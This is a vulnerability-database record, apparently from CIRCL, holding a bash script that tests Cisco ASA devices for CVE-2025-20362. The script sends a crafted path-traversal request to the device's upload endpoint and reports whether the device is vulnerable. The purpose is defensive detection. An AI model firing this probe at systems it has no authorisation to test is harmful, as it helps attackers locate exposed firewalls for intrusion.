{"uuid": "9b4cf20c-8f3e-4626-8fdb-9a78038a672d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "title": "Check vulnerables ASA's script", "description": "The script is available there to check if an ASA is vulnerable. \n\nhttps://gist.cnw.circl.lu/alexandre.dulaunoy/95ca6ae6259e4c8b899b916ee8b3d4a6\n\n\n\n```bash\n#!/bin/bash\n\n# CIRCL - 2025\n# Test CVE 2025-20362\n# Ref : https://attackerkb.com/topics/Szq5u0xgUX/cve-2025-20362/rapid7-analysis\n\nif [ -z \"$1\" ]; then\n  echo \"Test for CVE-2025-20362\"\n  echo \"Usage: $0 <IP>\"\n  exit 1\nfi\n\nIP=\"$1\"\n\necho \"Looking for CVE-2025-20362\"\nresponse=$(OPENSSL_CONF=<( \n  echo -e 'openssl_conf = openssl_init\\n\\n[openssl_init]\\nssl_conf = ssl_sect\\n\\n[ssl_sect]'\n  echo -e 'system_default = system_default_sect\\n\\n[system_default_sect]\\nOptions = UnsafeLegacyRenegotiation\\n'\n  cat /etc/ssl/openssl.cnf\n) curl \"https://$IP/+CSCOU+//../+CSCOE+/files/file_action.html?mode=upload&path=foo&server=srv&sourceurl=qaz\" \\\n  -S --insecure -v -o - --path-as-is 2>&1)\n\nif echo \"$response\" | grep -q \"HTTP/1.1 404\"; then\n  echo \"Not vulnerable\"\nelif echo \"$response\" | grep -q \"HTTP/1.1 200\"; then\n  echo \"Vulnerable\"\nfi\n\n```", "description_format": "markdown", "vulnerability": "CVE-2025-20362", "creation_timestamp": "2025-10-06T15:02:58.061302+00:00", "timestamp": "2025-10-06T16:25:58.212700+00:00", "related_vulnerabilities": ["CVE-2025-20362"], "meta": [{"tags": ["vulnerability:exploitability=industrialised", "vulnerability:information=PoC"]}], "author": {"login": "sync_user", "name": "sync_user", "uuid": "4f29edb9-4c4b-44ca-b041-9b050656b6ae"}}